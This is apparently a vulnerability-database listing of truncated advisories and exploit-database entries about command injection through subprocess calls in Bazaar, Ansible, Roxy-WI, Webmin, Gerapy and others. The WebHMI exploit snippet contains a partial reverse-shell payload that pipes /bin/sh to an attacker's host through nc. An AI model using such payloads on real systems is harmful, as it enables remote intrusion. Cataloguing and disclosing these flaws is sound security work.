SUSE CVE-2017-14176

Bazaar through 2.7.0, when Subprocess SSH is used, allows remote attackers to execute arbitrary commands via a bzr+ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117...

SUSE CVE-2020-1734

A flaw was found in the pipe lookup plugin of ansible. Arbitrary commands can be run, when the pipe lookup plugin uses subprocess.Popen with shell=True, by overwriting ansible facts and the variable is not escaped by quote plugin. An attacker could take advantage and run arbitrary commands by...

VulnCheck KEV: CVE-2022-31137

Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocessexecute function without processing the inputs received from the user in...

Debian dla-3150 : rexical - security update

The remote Debian 10 host has a package installed that is affected by a vulnerability as referenced in the dla-3150 advisory. - ------------------------------------------------------------------------- Debian LTS Advisory DLA-3150-1 [email protected] https://www.debian.org/lts/security/...

The vulnerability of the subprocess_execute function in the web interface for managing Roxy-WI servers allows a hacker to execute arbitrary code.

The vulnerability of the subprocessexecute function in the Roxy-WI server management web interface exists because measures to neutralize special elements used in operating system commands are not taken. Exploiting this vulnerability allows a remote attacker to execute arbitrary code...

Webmin 1.996 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Webmin 1.996 - Remote Code Execution RCE Authenticated Exploit Author: Emir Polat Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 Vendor Homepage: https://www.webmin.com/ Software Link: https://www.webmin.com/download.html Version: 1.997...

PT-2022-3949 · Haproxy +4 · Haproxy +4

Name of the Vulnerable Software and Affected Versions: Roxy-WI versions prior to 6.1.1.0 Description: Roxy-WI is a web interface for managing Haproxy, Nginx, Apache, and Keepalived servers. The issue arises from the subprocess execute function in the /app/options.py file, which does not properly...

GHSA-CWWH-4382-6FWR Dulwich RCE Vulnerability

Dulwich before 0.18.5, when an SSH subprocess is used, allows remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-1000116, and CVE-2017-1000117...

GHSA-JJXG-HPM7-G95F Bazaar allows remote attackers to execute arbitrary commands via a bzr+ssh URL with initial dash character in hostname

Bazaar through 2.7.0, when Subprocess SSH is used, allows remote attackers to execute arbitrary commands via a bzr+ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117...

OS Command Injection in ansible

A flaw was found in the pipe lookup plugin of ansible. Arbitrary commands can be run, when the pipe lookup plugin uses subprocess.Popen with shell=True, by overwriting ansible facts and the variable is not escaped by quote plugin. An attacker could take advantage and run arbitrary commands by...

Gerapy 0.9.7 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Gerapy 0.9.7 - Remote Code Execution RCE Authenticated Exploit Author: Jeremiasz Pluta Vendor Homepage: https://github.com/Gerapy/Gerapy Version: All versions of Gerapy prior to 0.9.8 CVE: CVE-2021-43857 Tested on: Gerapy 0.9.6 Vulnerability: Gerapy prior to version 0.9.8 is...

Security update for postrsd (moderate)

openSUSE Security Update: Security update for postrsd Announcement ID: openSUSE-SU-2021:1642-1 Rating: moderate References: 1180251 Cross-References: CVE-2020-35573 CVSS scores: CVE-2020-35573 NVD : 7.5 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Affected Products: openSUSE Backports SLE-15-SP3 ...

WebHMI 4.0 Remote Code Execution

Exploit Title: WebHMI 4.0 - Remote Code Execution RCE Authenticated Date: 12/12/2021 Exploit Author: Jeremiasz Pluta Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI Firmware """ payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2%261|nc+""" + localhost + """+""" +...

Gopherus

This is a Python script for a tool called Gopherus, which is used to exploit Server-Side Request Forgery SSRF vulnerabilities in various services. The tool can generate payloads for different services, including MySQL, PostgreSQL, FastCGI, Memcached, Redis, Zabbix, and SMTP. The script uses a...

RaspAP 2.6.6 - Remote Code Execution (Authenticated) Exploit

Exploit Title: RaspAP 2.6.6 - Remote Code Execution RCE Authenticated Exploit Author: Moritz Gruber Vendor Homepage: https://raspap.com/ Software Link: https://github.com/RaspAP/raspap-webgui Version: 2.6.6 Tested on: Linux raspberrypi 5.10.52-v7+ import requests from requests.api import post fro...

Huawei EulerOS: Security Advisory for PyYAML (EulerOS-SA-2021-2165)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2021 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Race condition

PostSRSd before 1.11 allows a denial of service subprocess hang if Postfix sends certain long data fields such as multiple concatenated email addresses. NOTE: the PostSRSd maintainer acknowledges "theoretically, this error should never occur ... I'm not sure if there's a reliable way to trigger...

CVE-2021-35525

PostSRSd before 1.11 allows a denial of service subprocess hang if Postfix sends certain long data fields such as multiple concatenated email addresses. NOTE: the PostSRSd maintainer acknowledges "theoretically, this error should never occur ... I'm not sure if there's a reliable way to trigger...

Android 2.0 FreeCIV Arbitrary Code Execution

""" Android Debug Bridge ADB freeciv exploit Author : Raed-Ahsan https://linkedin.com/in/raed-ahsan Android 2.0 Banana Studio """ """ import socket socket import subprocess Subprocess import pyautogui PyAutoGui import time Time def connectionfunctionhost, port: s = socket.socketsocket.AFINET,...

Security update for postsrsd (moderate)

openSUSE Security Update: Security update for postsrsd Announcement ID: openSUSE-SU-2021:0646-1 Rating: moderate References: 1180251 Cross-References: CVE-2020-35573 Affected Products: openSUSE Leap 15.2 An update that fixes one vulnerability is now available. Description: This update for postsrs...